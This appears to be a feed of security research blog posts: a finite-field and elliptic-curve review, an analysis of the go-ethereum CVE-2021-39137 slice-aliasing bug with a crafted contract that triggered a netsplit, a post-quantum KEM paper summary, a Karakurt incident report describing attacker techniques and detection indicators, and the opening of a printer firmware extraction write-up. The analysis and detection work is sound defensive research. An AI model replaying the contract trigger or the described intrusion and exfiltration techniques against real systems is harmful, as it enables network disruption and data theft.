The review below will not be sufficient for a reader who is not familiar with these topics, but should act as a gentle reminder for a rusty one.

Groups, Fields and Curves

Groups

For a set G to be considered as a group we require a binary operator \circ such that the following properties hold:

  • Closure: For all a,b \in G, the composition a \circ b \in G
  • Associativity: a \circ (b \circ c) = (a \circ b) \circ c for all a,b,c \in G
  • Identity: there exists an element e such that e \circ a = a \circ e = a for all a \in G
  • Inverse: for every element a \in G there is an element b \in G such that a\circ b = b \circ a = e

An Abelian group has the additional property that the group law is commutative:

  • Commutativity: a \circ b= b \circ a for all elements a,b \in G.
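As a concrete example, the integers \mathbb{Z} under addition form an Abelian group: the sum of two integers is an integer, addition is associative and commutative, the identity is 0, and the inverse of a is -a.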

Fields and Rings

A field is a set of elements which has a group structure for two operations: addition and multiplication. Additionally, the field operations are commutative and distributive. When considering the group multiplicatively, we remove the identity of the additive group from the set to ensure that every element has a multiplicative inverse. An example of a field is the set of real numbers \mathbb{R} or the set of integers modulo a prime \mathbb{Z} / p\mathbb{Z} (see below).

We denote the multiplicative group of a field k as k^*.

A ring is very similar, but we relax the criterion that every non-zero element has a multiplicative inverse (and multiplication need not be commutative). An example of a ring is the set of integers \mathbb{Z}: every integer a \in \mathbb{Z} has an additive inverse -a \in \mathbb{Z}, but for a general a \in \mathbb{Z} there is no b \in \mathbb{Z} with a \times b = 1 (unless a = b = 1 or a = b = -1).

Finite Fields

Finite fields, also known as Galois fields, are denoted in this blog post as \mathbb{F}_q for q = p^k for some prime p and positive integer k. When k=1, we can understand \mathbb{F}_p as the set of elements \mathbb{Z} / p\mathbb{Z} = \{0, \ldots, p-1 \} which is closed under addition and excluding 0, is also closed under multiplication. The multiplicative group is \mathbb{F}_p^* = \{ 1, 2, \ldots, p-1 \}.

When k > 1, the finite field \mathbb{F}_q has elements which are polynomials \mathbb{F}_p[x] of degree d < k. The field is generated by first picking an irreducible polynomial f(x) and considering the field \mathbb{F}_q = \mathbb{F}_p[x] / (f). Here the quotient by (f) can be thought of as using f(x) as the modulus when composing elements of \mathbb{F}_q.
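As a small worked example, x^2 + 1 is irreducible over \mathbb{F}_3 (no element of \{0, 1, 2\} squares to -1 \equiv 2), so \mathbb{F}_9 = \mathbb{F}_3[x] / (x^2 + 1) consists of the nine elements a + bx with a, b \in \mathbb{F}_3. Arithmetic reduces with x^2 = -1; for instance (x + 1)(x + 2) = x^2 + 3x + 2 = x^2 + 2 = -1 + 2 = 1, so x + 1 and x + 2 are multiplicative inverses of each other.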

Elliptic Curves

For our purposes, we consider elliptic curves over finite fields, of the form

E(\mathbb{F}_q) : y^2 = x^3 + Ax + B,

where the coefficients A,B \in \mathbb{F}_q and a point on the curve P(x,y) is a solution to the above equation where x,y \in \mathbb{F}_q, together with an additional point \mathcal{O} which is called the point at infinity. The field \mathbb{F}_{q} where q = p^k has characteristic p and to use the form of the curve equation used above, we must additionally impose p \neq 2,3.

The set of points on an elliptic curve form a group and the point at infinity acts as the identity element: P + \mathcal{O} = \mathcal{O} + P = P and P - P = \mathcal{O}. The group law on an elliptic curve is efficient to implement. Scalar multiplication is realised by repeated addition: [3]P = P + P + P.
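As a small worked example, take E(\mathbb{F}_7) : y^2 = x^3 + 3 and the point P = (1, 2). Doubling uses the tangent slope \lambda = (3x^2 + A)/(2y) = 3 \cdot 4^{-1} = 3 \cdot 2 = 6, and then [2]P = (\lambda^2 - 2x, \lambda(x - x_3) - y) = (6, 3), which indeed lies on the curve since 3^2 = 2 = 6^3 + 3 \pmod 7.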

Footnotes

  1. One year later, this attack was generalised by Frey and Ruck to ordinary elliptic curves and is efficient when the embedding degree of the curve is “low enough”. We will make this statement more precise later in the blogpost.
  2. As a recap, the decision Diffie-Hellman (DDH) problem concerns the assumed hardness of distinguishing between the triples (g^a, g^b, g^{ab}) and (g^a, g^b, g^{c}) where a,b,c are chosen randomly. Note that if the discrete log problem is easy, so is DDH, but being able to solve DDH does not necessarily allow us to solve the discrete log problem.
  3. The roots of unity are the elements \mu_r \in \mathbb{F}_{p^k} such that (\mu_r)^r = 1. As a set, the rth roots of unity form a multiplicative cyclic group.
  4. It can be proved that the Weil embedding degree k \geq 1 always exists, and that the r-torsion group E(\mathbb{F}_{p^k})[r] \subset E(\mathbb{F}_{p^k}) decomposes into \mathbb{Z}_r \times \mathbb{Z}_r. Once k has been found, further extending the field will not increase the size of the r-torsion.
  5. In an attempt to not go too far off topic, a divisor can be understood as a formal sum of points \mathcal{D} = n_1 P_1 + \ldots + n_k P_k. Given a rational function f(x,y), the divisor (f) of the function is a measure of how the curve f(x,y) = 0 intersects with the elliptic curve E and is computed as \sum_{P \in E} \text{ord}_P(f)(P). For a very good and comprehensive discussion of the mathematics (algebraic geometry) needed to appreciate the computation of pairings, we recommend Craig Costello’s Pairings for Beginners.
  6. As another way to think about this, we have that (p^k - 1) = rN for some integer N. We can rephrase this as p^k \equiv 1 \pmod r, and so the Tate embedding degree k is the order of p \pmod r.
  7. The distribution of small k was formally studied in the context of the expectation that a random curve could be attacked by the MOV algorithm. R. Balasubramanian & N. Koblitz showed in The Improbability That an Elliptic Curve Has Subexponential Discrete Log Problem under the Menezes—Okamoto—Vanstone Algorithm that the probability that we find a small embedding degree: k < (\log p)^2 is vanishingly small.
  8. Hashing bytes to a point on a curve can be efficiently performed, as described in Hashing to Elliptic Curves
  9. This BLS triple is distinct from the BLS curves, although Ben Lynn is common to both of them
  10. The term operations here can hide a computational complexity. If your operation is addition of elliptic curve points, this will have an additional hidden cost when compared to an operation such as bit shifting, or multiplication modulo some prime. Some authors mitigate this by using a clock cycle as the operation.
  11. Although here we think of this key as a 256-bit-long stream of 1s and 0s, we’re much more familiar with seeing this 32-byte key as a hexadecimal or base64 encoded string
  12. For fun, we include a tongue-in-cheek estimate. Equipping every one of the world’s 8 billion humans with their very own “world’s fastest supercomputer”, the burning hot computer-planet would be guessing \sim2^{80} keys per second. At this rate, it would take 17 million years to break AES-128. For AES-256, you’ll need a billion copies of these supercomputer Earths working for more than 2 billion times longer than the age of the universe. 🥵
  13. In fact, this relationship between factoring and the discrete log problem even shows up in a quantum context. Shor’s algorithm was initially developed as a method to solve the discrete log problem and only then was modified (with knowledge of this close relationship) to then produce a quantum factoring algorithm. Shor tells this story in a great video.
  14. When an elliptic curve has additional structure we can sometimes solve the ECDLP using sub-exponential algorithms by mapping points on the curve to some “easier” group. When the order of the elliptic curve is equal to its characteristic (\# E(\mathbb{F}_p) = p), Smart’s anomalous curve attack maps points on the elliptic curve to the additive group of integers mod p, which means the discrete logarithm problem is as hard as inversion mod p (which is not hard at all!). When the embedding degree k is small enough, we can use pairings to map from points on the elliptic curve to the multiplicative group \mathbb{F}^*_{p^k}. This is exactly the worry we have here, so let’s go back to the main text!
  15. In this context, medium refers to a number theorist’s scale, which we can interpret as “cryptographically sized”. Although 5000 bit numbers seem large for us, number theorists are interested in all the numbers and the set of numbers you can store in a computer are still among the smallest of the integers!
✇NCC Group Research

A deeper dive into CVE-2021-39137 – a Golang security bug that Rust would have prevented

By: aleks224

This blog post discusses two erroneous computation patterns in Golang. By erroneous computation we mean simply that given certain input, a computer program with certain state returns incorrect output or enters an incorrect state. While clearly there are no limits on how erroneous computations can happen in general, there are language usage patterns which make erroneous computation more likely. In blockchain, erroneous computation is a problem as the ledger can end up in an unexpected state or the blockchain may get wedged at a certain corrupt endpoint. In addition, if erroneous computation happens in only a subset of nodes on the network, a netsplit occurs, which may result in double-spend attacks.

The first erroneous computation example is CVE-2021-39137, an interesting go-ethereum bug identified by Guido Vranken. The bug caused a netsplit in the Ethereum network and essentially results from the ability to have a mutable and a non-mutable slice referencing the same chunk of memory. The second erroneous computation pattern example is extracted from the Go Programming book by Donovan and Kernighan and concerns deferred functions’ access to parent-scope variables. This pattern could happen in any language that supports parent-scope variables in a similar way to Golang.

This blog post is motivated by NCC Group’s reviews of Cosmos blockchain implementations. Cosmos is a blockchain building framework which offers an out-of-the-box consensus protocol and an SDK that provides tools backing common state transition code and, as such, aims to be the "Ruby on Rails of blockchain". It allows connecting to other Cosmos blockchains via IBC (Inter Blockchain Communication Protocol) and allows drawing consensus security from parent chains (inter-blockchain security). The developer mainly implements the state-transition logic. It is worth noting that:

  • Panics are recovered from by the Cosmos framework and treated as errors. This renders a whole class of Golang denial-of-service bugs unimportant, including e.g. nil pointer dereferences, out-of-bounds array/slice reads and writes, calling methods on nil interfaces, etc.
  • Oftentimes, Cosmos SDK blockchain apps are fairly simple in terms of the Golang constructs they use. They may be conservative in that they don’t use Go routines and channels, another common source of bugs in Golang. In addition, the severity of eventual race conditions may be low, due to the fact that the condition needs to happen on a large portion of nodes at once.

Given the setting described above, other generic erroneous computation patterns in Golang are worth discussing (unrelated to denial of service via panic or Golang’s concurrency primitives). Let’s discuss the first bug, which we speculate would not have happened had Rust been used, since Rust does not allow simultaneously having a mutable and an immutable reference pointing to the same memory.

CVE-2021-39137: Erroneous computation in go-ethereum

Given a specially crafted contract, go-ethereum nodes would fork off the network, as their contract evaluation result would differ from the rest of the network. Erroneous computation in blockchain clients is a serious issue, since it results in network forks and can lead to double-spend attacks.

The post-mortem which explains this bug involves several EVM details with which the reader may not be familiar. We start with a code snippet that removes all the EVM details, is very simple, and makes the bug obvious. It should be noted that the code below is not present in the go-ethereum implementation, it just mimics the essence of the issue when all of the EVM details are removed:

func returnAndCopy(mem []byte, n int, copyTo int) []byte {
	// boundary checks omitted

	ret := mem[0:n]

	copy(mem[copyTo:copyTo+n], mem[0:n])    // copy(dst, src)

	return ret
}

The returnAndCopy function returns the first n bytes of a slice. Before that, it copies those same n bytes to a different location in the slice. For example:

 slice := []byte{0,1,2,3,4,5,6,7,8,9}
 fmt.Println(returnAndCopy(slice, 3, 5))    // [0 1 2]

In this case, the returnAndCopy function returns correct values:

  0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9
  ----------         -----------  
   return  	        copyTo

  0 | 1 | 2 | 3 | 4 | 0 | 1 | 2 | 8 | 9
  ----------         -----------  
   return	        copyTo

  return: 0 | 1 | 2      // correct

In this example, the return interval and copy interval do not intersect. If the intervals have shared (common) locations in the array, but do not point to the exact same subarray, returnAndCopy fails to produce the correct result:

 slice := []byte{0,1,2,3,4,5,6,7,8,9}
 fmt.Println(returnAndCopy(slice, 3, 1))    // [0 0 1]

In more detail:

  0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9
  ----------         
  return	      
      ----------
        copyTo

  0 | 0 | 1 | 2 | 4 | 5 | 6 | 7 | 8 | 9
  ----------         
  return	      
     -----------
        copyTo

  return: 0 | 0 | 1      // incorrect

The issue is that ret and mem point to the same backing memory: a modification through mem affects the ret slice in an unintended way. It is interesting to note that the same bug would likely be prevented in Rust, as the compiler forbids simultaneously holding a mutable and an immutable reference to the same memory location. If that is the case, Rust’s memory safety principles would have prevented this hard fork bug from happening.

Mapping to EVM: CVE-2021-39137 identifies the previously described pattern inside go-ethereum‘s EVM. Let’s start by looking at the key line of the contract that demonstrated the vulnerability, decompiled from the statetest provided at the end of the post-mortem.

contract Contract {
    function main() {
        memory[0x00:0x01] = 0x01;
        memory[0x01:0x02] = 0x02;
        memory[0x02:0x03] = 0x03;
        memory[0x03:0x04] = 0x04;
        memory[0x04:0x05] = 0x05;
        memory[0x05:0x06] = 0x06;
        var temp0;
        temp0, memory[0x02:0x08] = address(0x04).call.gas(0x7ef0367e633852132a0ebbf70eb714015dd44bc82e1e55a96ef1389c999c1bca)(memory[0x00:0x06]);     // (1) 
        // [...]

After filling up the EVM contract memory with an increasing sequence of bytes, a contract at address 0x04 is called at the line denoted by (1).

The contract at address 0x04 is a special, "pre-compiled" contract and it is implemented natively in go-ethereum. Pre-compiled contracts implement commonly used functionalities such as hash function computation and elliptic curve operations. In this case, the dataCopy pre-compiled contract is very simple, it implements the "identity" function, which just returns its one argument:

func (c *dataCopy) Run(in []byte) ([]byte, error) {
        return in, nil
}

Let’s next look at what happens inside opCall, right after dataCopy is called:

func opCall(pc *uint64, interpreter *EVMInterpreter, scope *ScopeContext) ([]byte, error) {

  // ..SNIP..

        ret, returnGas, err := interpreter.evm.Call(scope.Contract, toAddr, args, gas, bigVal)  // (2)

	if err != nil {
                temp.Clear()
        } else {
                temp.SetOne()
        }
        stack.push(&temp)
        if err == nil || err == ErrExecutionReverted {
                //  ret = common.CopyBytes(ret)       //  (3) (FIX)
                scope.Memory.Set(retOffset.Uint64(), retSize.Uint64(), ret)    // (4) overwrite
        }
        scope.Contract.Gas += returnGas

	interpreter.returnData = ret    // (5) returnData set
        return ret, nil
}

Relevant to CVE-2021-39137 are the following aspects:

  • In the line denoted with (2), the ret value is a slice that points to the first 6 bytes of the contract memory. That portion of the memory was chosen by the caller in the offending contract (memory[0x00:0x06], see line (1)). The dataCopy contract does not create a new copy of memory before returning.
  • The call to scope.Memory.Set copies ret to another location, see line (4). The copy target location is chosen by the caller and in the case of the decompiled contract above, it is memory[0x02:0x08], see line (1).
  • Close to the end of the opCall implementation, at line (5), interpreter.returnData is set to ret, that is, memory[0x00:0x06]. In EVM, the interpreter keeps track of "returnData": an internal holder for the data returned by the most recent call into another contract.

The scope.Memory.Set line corrupts the memory that returnData will point to, and returnData ends up being incorrect (1|2|1|2|3|4 as opposed to the expected 1|2|3|4|5|6, given the bytes the contract wrote). The fix is to add line (3), which preserves the original subslice that will be returned before it is overwritten.

Note: A related issue in Golang concerns memory reallocation in the context of the append function: whether the slice returned by append shares its backing array with the input depends on the input’s spare capacity. This type of edge-case behavior can be more likely to cause issues as it may evade detection in testing.
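To illustrate, here is a minimal standalone sketch (not taken from the go-ethereum codebase) showing both behaviors:

package main

import "fmt"

func main() {
	base := make([]byte, 3, 8) // len 3, cap 8

	alias := append(base, 1) // fits within cap: shares base's backing array
	alias[0] = 42
	fmt.Println(base[0]) // 42: the write through alias is visible via base

	grown := append(base, 1, 2, 3, 4, 5, 6) // exceeds cap: reallocates
	grown[0] = 7
	fmt.Println(base[0]) // still 42: grown has its own backing array
}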

Parent scope variables in deferred execution

This bug is similar to a general bug pattern where global variables change underneath code in an unforeseen way. Recall that functions are "first-class values" (pg. 135, sect 5.6 in the Golang book):

func main() {

	var f func(k int) int

	f = func(n int) int {
		return n*n
	}

        fmt.Println(f(2))      // 4 

}

This means that functions can be assigned to variables, passed to and returned from functions. Functions cannot be compared, and their zero value is nil. It is interesting to note that functions can carry state (they are closures). See the following example:

func createIncrease() func() int {

	x := 0
	increase := func() int {
                x = x + 1
                return x
        }

	return increase
}  // x goes out of scope

func main() {

	f := createIncrease()

        fmt.Println(f())  // 1
        fmt.Println(f())  // 2
}

Even though x went out of scope (as a local variable inside the createIncrease function), x still exists as part of the f function’s state. We don’t see x anymore, but it’s there. There is also the question of what happens if multiple functions pick up the same parent scope variable:

func createIncreaseAndSquare() (func() int, func() int) {
        x := 2
        increase := func() int {
                x = x + 1
                return x
        }

        square := func() int {
                x = x*x
                return x
        }

	return increase, square
}

func main() {

	// x is created inside createIncreaseAndSquare and goes out of scope
	f, g := createIncreaseAndSquare()

	// x lives on
	fmt.Println(g())  // 4
        fmt.Println(g())  // 16

	// f shares the same x as g
        fmt.Println(f())  // 17
}

As can be seen, the parent-scope variable is shared between the two functions. This is similar to the usage of global variables, where a global variable may change underneath a deferred function from multiple locations in the code.

func main() {

        keys := []string{"first", "second", "third"}
        m := make(map[string]bool)
	var cleanupFs []func()

        for _, k := range keys {

		m[k] = true

		// k := k       <-- FIX

		cleanupFs = append(cleanupFs, func() {
                        fmt.Println("deleting ", k)
		        delete(m, k)
	        })
	}

	// ..do something with m..

	// clean up
        for _, cleanup := range cleanupFs {
                cleanup() 
	}
}

The map does not properly get cleaned up. The "clean up" for loop only deletes the "third" key from the map and does so 3 times:

	// deleting  third
	// deleting  third
	// deleting  third

As the loop runs, the cleanup closures all capture the parent scope’s k variable. By the end of the for loop, the delayed functions and the parent function share the same k, which is equal to "third".

Conclusion

Both bug types described in this blog post can roughly be described as variable content unexpectedly changing underneath code. Whether a particular logical issue of this type is labeled as a security issue or not is less important. Audits of correctness-critical Golang code such as Cosmos blockchain code should include checking for these types of issues.

Written by Aleks Kircanski of NCC Group Cryptography Services

✇NCC Group Research

BAT: a Fast and Small Key Encapsulation Mechanism

By: Thomas Pornin

In this post we present a newly published key encapsulation mechanism (KEM) called BAT. It is a post-quantum algorithm, using NTRU lattices, and its main advantages are that it is both small and fast. The paper was accepted by TCHES (it should appear in volume 2022, issue 2) and is also available on ePrint: https://eprint.iacr.org/2022/031

An implementation (in C, both with and without AVX2 optimizations) is on GitHub: https://github.com/pornin/BAT

What is a Post-Quantum KEM?

Asymmetric cryptography, as used in, for instance, an SSL/TLS connection, classically falls into two categories: digital signatures, and key exchange protocols. The latter designates a mechanism through which two parties send each other messages, and, at the end of the protocol, end up with a shared secret value that they can use to perform further tasks such as symmetric encryption of bulk data. In TLS, the key exchange happens during the initial handshake, along with signatures to convince the client that it is talking to the expected server and none other. A key encapsulation mechanism is a kind of key exchange protocol that can work with only two messages:

  • Party A (the server, in TLS) sends a generic, reusable message that is basically a public key (this message can conceptually be sent in advance and used by many clients, although in TLS servers usually make a new one for each connection, to promote forward secrecy).
  • Party B (the client, in TLS) sends a single message that uses the information from A’s message.

Key encapsulation differs from asymmetric encryption in the following sense: the two parties ultimately obtain a shared secret, but neither gets to choose its value; it is an output of the protocol, not an input. The two concepts of KEM and asymmetric encryption are still very close to each other; an asymmetric encryption scheme can be used as a KEM by simply generating a sequence of random bytes and encrypting it with the recipient’s public key, and, conversely, a KEM can be extended into an asymmetric encryption system by adjoining a symmetric encryption algorithm to it, encrypting a message using, as key, the shared secret produced by the KEM (when the KEM is Diffie-Hellman, there is even a rarely used standard for that, called IES).
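To make the shape of a KEM concrete, here is a minimal interface sketch in Go; the names are illustrative only, and not taken from BAT’s implementation or any particular library:

package kem

// KEM is a key encapsulation mechanism reduced to its three operations.
type KEM interface {
	// GenerateKeyPair creates a reusable public key and the matching
	// private key; the public key is party A's generic first message.
	GenerateKeyPair() (publicKey, privateKey []byte, err error)

	// Encapsulate consumes a public key and produces a ciphertext plus
	// a shared secret; neither party gets to choose the secret.
	Encapsulate(publicKey []byte) (ciphertext, sharedSecret []byte, err error)

	// Decapsulate recovers the same shared secret from the ciphertext
	// using the private key.
	Decapsulate(privateKey, ciphertext []byte) (sharedSecret []byte, err error)
}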

In today’s world, we routinely use KEMs which are fast and small, based on elliptic curve cryptography (specifically, the elliptic curve Diffie-Hellman key exchange). However, tomorrow’s world might feature quantum computers, and a known characteristic of quantum computers is that they can easily break ECDH (as well as older systems such as RSA or classic Diffie-Hellman). There is currently no quantum computer that can do so, and it is unknown whether there will be one in the near future (or ever), but it makes sense to make some provisions for that potential ground-breaking event, that is, to develop some post-quantum algorithms, i.e. cryptographic algorithms that will (presumably) successfully defeat attackers who wield quantum computers.

The NIST has been running for the last few years a standardization process (officially not a competition, though it features candidates and rounds and finalists) that aims at defining a few post-quantum KEMs and signature algorithms. Among the finalists in both categories are algorithms based on lattice cryptography; for KEMs, the two lattice-based algorithms with the “best” performance trade-offs are CRYSTALS-Kyber and Saber.

BAT

BAT is not a candidate in the NIST post-quantum project; it has only just been published, which is far too late to enter that process. However, just like the standardization of elliptic curve cryptography in the late 1990s (with curves like NIST’s P-256) did not prevent the appearance and wide usage of other curve types (e.g. Curve25519), there is no reason not to keep researching and proposing new schemes with different and sometimes better performance trade-offs. Let us compare some performance measurements for Kyber, Saber and BAT (using the variants that target “NIST level 1” security, i.e. roughly the same as AES-128, and in practice the only one you really need):

Algorithm   Keygen cost     Encapsulation        Decapsulation        Public key      Ciphertext
            (kilocycles)    cost (kilocycles)    cost (kilocycles)    size (bytes)    size (bytes)
Kyber             23.6            36.8                 28.5                800             768
Saber             50.0            59.0                 57.2                672             736
BAT              29400            11.1                 59.7                521             473

Kyber, Saber and BAT performance on Intel x86 Coffee Lake

These values were all measured on the same system (Intel x86 Coffee Lake, 64-bit, Clang-10.0.0). Let us see what these numbers mean.

First, it is immediately obvious that BAT’s key pair generation is expensive, at close to 30 million clock cycles. It is a lot more than for the two other algorithms. However, it is not intolerably expensive; it is still about 10 times faster than RSA key pair generation (for 2048-bit keys), and we have been using RSA for decades. This can still run on small embedded microcontrollers. Key pair generation is, normally, a relatively rare operation. It is quite convenient if key pair generation is very fast, because, for instance, it would allow a busy TLS server to create a new key pair for every incoming connection, which seems best for forward secrecy, but if key pair generation is not so fast, then simply creating a new key pair once every 10 seconds can still provide a fair amount of forward secrecy, at negligible overall cost.

Then we move to encapsulation and decapsulation costs, and we see that BAT encapsulation (the client-side operation, in a TLS model) is very fast, with a cost lower than a third of the cost of Kyber encapsulation, while decapsulation is still on par with that of Saber. We could claim a partial victory here. Does it matter? Not a lot! With costs way lower than a million cycles, everything here is way too fast to have any noticeable impact on a machine such as a laptop, smartphone or server, even if envisioning a very busy server with hundreds of incoming connections per second. Cost may matter for very small systems, such as small microcontrollers working on minimal power, but the figures above are for a big 64-bit x86 CPU with AVX2 optimizations everywhere, which yields very little information on how things would run on a microcontroller (an implementation of BAT optimized for such a small CPU is still a future work at this time).

What really matters here for practical Web-like deployments is the sizes. Public keys and ciphertexts (the two messages of a KEM) travel on the wire, and while networks are fast, exchanges that require extra packets tend to increase latency, an especially sensitive parameter in the case of TLS key exchanges since they happen at the start of the connection, when the human user has clicked on the link and is waiting for the target site to appear. Human users have very low patience, and it is critical to have as low a latency as possible. Cloudflare has recently run some experiments with post-quantum signature schemes in that area, and it appeared that the size of public keys and signatures of current candidates is a problem. Similar issues impact KEMs as well (though with a lower magnitude, because a TLS handshake involves a single KEM but typically several signatures and public keys, conveyed in X.509 certificates).

We may also expect size of public keys and ciphertexts to be an important parameter for low-power embedded applications with radio transmission: the energy cost of message transmission is proportional to its size, and is typically much greater than the cost of the computations that produced that message.

We see that BAT offers public key and ciphertext sizes which are significantly lower than those of Kyber and Saber, with savings of about 25 to 40%. This is where BAT shines, and what makes the scheme interesting and worth investigating a bit. Like all new schemes, it shall certainly not be deployed in production! It should first undergo some months (preferably years) of analysis by other researchers. If BAT succeeds at defeating attackers for a few years, then it could become a good candidate for new protocols that need a post-quantum KEM.

The Lattice

Without entering into the fine details of the lattice used by BAT, I am going to try to give an idea about how BAT can achieve lower public key and ciphertext sizes.

Practical lattice-based algorithms tend to work with lattices expressed over a polynomial ring: values are polynomials whose coefficients are integers modulo a given integer q (usually small or small-ish, not necessarily a prime), with polynomial computations made modulo the polynomial X^n + 1, where n is a power of 2, often 256, 512 or 1024 (these are convenient cyclotomic polynomials, which allow very fast computations thanks to the number-theoretic transform). Depending on the scheme, there may be one or several such values in a public key and/or a ciphertext. While the internal mechanics differ in their details and even in the exact hard problem they rely on, they tend to have the same kind of trade-off between security, reliability and modulus size.

Indeed, encapsulation can be thought of as injecting a random value as “error bits” in an operation, and decapsulation leverages the private key in order to find the most plausible initial input, before the errors were inserted. Larger errors hide the secret better, but also increase the probability that the decapsulation gets it wrong, i.e. obtains the wrong output in the end. In order to maintain the security level while getting decapsulation error probability so low that it will never happen anywhere in the world, the usual trick is to increase the value of the modulus q. However, a larger q mechanically implies a larger public key and a larger ciphertext, since these are all collections of values modulo q. There are various tricks that can save some bits here and there, but the core principle is that a larger q is a problem and an algorithm designer wants to have q as small as possible.

Saber uses q = 8192. Kyber uses q = 3329. In BAT, q = 257. This is why BAT keys and ciphertexts are smaller.

How does BAT cope with the smaller q? In a nutshell, it has an enhanced decapsulation mechanism that “gets it right” more often. The BAT lattice is a case of an NTRU lattice with a complete basis: the private key consists of (in particular) four polynomials f, g, F and G, with small integer coefficients (not integers modulo q, but plain integers), which are such that gF – fG = q. This is known as the NTRU equation. Polynomials f and g are generated randomly with a given distribution, and finding matching F and G is the reason why the key pair generation of BAT is expensive. This is in fact the same key pair generation as in the signature scheme Falcon, though with slightly smaller internal values, and, I am pleased to report, no floating-point operations anywhere. BAT is completely FPU-free, including in the key pair generation; that should make it quite a bit easier to implement on microcontrollers.

Any (F,G) pair that fulfills the NTRU equation allows some decapsulation to happen, but the error rate is lowest when F and G are smallest. The F and G polynomials are found as an approximate reduction using Babai’s nearest plane algorithm, which would return an “optimal” solution with non-integral coefficients, so the coefficients are rounded and F and G are only somewhat good (they are the smallest possible while still having integers as coefficients). The main idea of BAT is to make “better” F and G by also working part of the decapsulation modulo another prime (64513, in the case of BAT) with an extra polynomial (called w in the paper) that in a way incarnates the “missing decimals” of the coefficients of F and G. These computations happen only on the decapsulation side; they don’t impact the public key or ciphertext sizes, but they considerably lower the risk of a decapsulation error, and thereby allow using a much smaller modulus q, which leads to the smaller public keys and ciphertexts.

Next Steps

BAT is still in its infancy and I hope other researchers will be motivated into trying to break it (and, hopefully, fail) and extending it. This is ongoing research. I will also try to make an optimized implementation for a small microcontroller (in the context of the NIST post-quantum project, the usual target is the ARM Cortex M4 CPU; the current C code should compile as is and run successfully, but this should be done and performance measured, and some well-placed assembly routines can most likely reduce costs).

✇NCC Group Research

Detecting Karakurt – an extortion focused threat actor

By: RIFT: Research and Intelligence Fusion Team

Authored by: Simon Biggs, Richard Footman and Michael Mullen

tl;dr

NCC Group’s Cyber Incident Response Team (CIRT) have responded to several extortion cases recently involving the threat actor Karakurt. 

During these investigations NCC Group CIRT have identified some key indicators that the threat actor has breached an environment, and we are sharing this intelligence to assist the cyber defence community.

It is thought that there may be a small window to respond to an undetected Karakurt breach prior to data exfiltration taking place and we strongly urge any organisations that use single factor Fortinet VPN access to use the information from the detection section of this blog to identify if they may have been breached. 

Initial Access  

In all cases investigated, Karakurt have targeted single factor Fortigate Virtual Private Network (VPN) servers.  

It was observed that access was made using legitimate Active Directory credentials for the victim environment. 

The typical dwell time (time from threat actor access to detection) has been in the region of just over a month, in part because the group do not encrypt their victims’ data and use “living off the land” techniques to remain undetected, not utilising anything recognised as malware.

It is not clear how these credentials have been obtained at this stage with the VPN servers in question not being vulnerable to the high profile Fortigate vulnerabilities that have had attention over the past couple of years. 

NCC Group strongly recommends that any organisation utilising single factor authentication on a Fortigate VPN to search for the indicators of compromise detailed at the conclusion of this blog.  

Privilege Escalation  

Karakurt have obtained access to domain administrator level privileges in all of the investigated cases, but the privilege escalation method has not yet been accurately determined.  

In one case, attempts to exploit CVE-2020-1472, also known as Zerologon, were detected by security software. The environment was not in fact vulnerable to Zerologon, however, indicating that Karakurt may be attempting to exploit a number of vulnerabilities as part of their operation.

Lateral Movement  

Karakurt have then been seen to move laterally onto the primary domain controller of their victims using the Sysinternals tool PsExec, which provides a multitude of remote functionality.

Karakurt have also utilised Remote Desktop Protocol (RDP) to move around victim environments.      

Discovery  

Once Karakurt obtain access to the primary domain controller they conduct a number of discovery actions, enumerating information about the domain controller itself as well as the wider domain.  

One particular technique involves creating a DNS Zone export via an Encoded PowerShell command.  

This command leaves a series of indicators in the Microsoft-Windows-DNS-Server-Service Event Log in the form of Event ID 3150, DNS_EVENT_ZONE_WRITE_COMPLETED.  

This log is interesting as an indicator because it was present in all Karakurt engagements investigated by NCC Group CIRT, and in all cases the only occurrences of these events were caused by Karakurt performing the zone exports. This was conducted very early in the breach, just after initial access and prior to data exfiltration, which typically took place two weeks after initial access.

This action is also accompanied by extraction of the NTDS.dit file, believed to be utilised by Karakurt to obtain further credentials as a means of persistence in the environment should the account they initially gained access with be disabled.  

This is evident through the presence of logs showing the volume shadow service being utilised.  

NCC Group CIRT strongly recommends that any organisation using single factor Fortinet VPN access checks their domain controllers’ Microsoft-Windows-DNS-Server logs for evidence of Event ID 3150. If this is present at any point since December, then it may well be an indicator of a breach by Karakurt.

Data Staging  

Once the discovery actions have been completed, Karakurt appear to leave the environment before re-entering and identifying servers with access to sensitive victim data on file shares. Once such a server is identified, a secondary persistence mechanism is utilised in the form of the remote desktop software AnyDesk, allowing Karakurt access even if the VPN access is removed.

On the same server on which AnyDesk is installed, Karakurt have been identified browsing folders local to the server and on file shares.

7-Zip archives have then been created on the server.  

In the cases investigated there were no firewall logs or other evidence to confirm that the data was then exfiltrated, but based on the claims from Karakurt, along with the file tree text file provided as proof, it is strongly believed that the data was exfiltrated in all cases investigated.

It is suspected that Karakurt are utilising Rclone to exfiltrate data to cloud data hosting providers. This technique was discussed in a previous NCC Group blog, Detecting Rclone – An Effective Tool for Exfiltration 

Mitigations  

  • To remove the threat immediately multi-factor authentication should be implemented for VPN access using a Fortinet VPN.  
  • Ensure all Domain Controllers are fully patched and patch for critical vulnerabilities generally. 

Detection  

  • Look for evidence of hosts authenticating from the VPN pool using the default naming convention for Windows hosts, for example DESKTOP-XXXXXX.
  • Check for event log 3150 in the Microsoft-Windows-DNS-Server-Service Event Log. 
  • Check for unauthorised use of AnyDesk or PsExec in the environment. 
✇NCC Group Research

Bypassing software update package encryption – extracting the Lexmark MC3224i printer firmware (part 1)

By: Catalin Visinescu

Summary

On November 3, 2021, Zero Day Initiative Pwn2Own announced that NCC Group EDG (Exploit Development Group) remotely exploited a vulnerability in the MC3224i printer firmware that offered full control over the device. Note that for Pwn2Own the printer was running the latest version of the firmware, CXLBL.075.272.
Listed as one of the targets of Austin 2021 Pwn2Own, the Lexmark MC3224i is a popular all-in-one color laser printer with great reviews on various sellers’ websites.

The vulnerability has now been addressed by Lexmark and the ZDI advisory is available here. Part 2 will contain more information on the vulnerability and exploitation.

Lexmark encrypts the firmware update packages provided to consumers, making binary analysis more difficult. With a little over a month of research time assigned and few targets to look at, NCC Group decided to remove the flash memory and extract the firmware using a programmer, firmware which we (correctly) assumed would be stored unencrypted. This allowed us to bypass the firmware update package encryption. With the firmware extracted, the binaries could be reverse-engineered to find vulnerabilities that would allow remote code execution.

Extracting the firmware from the flash

PCB overview

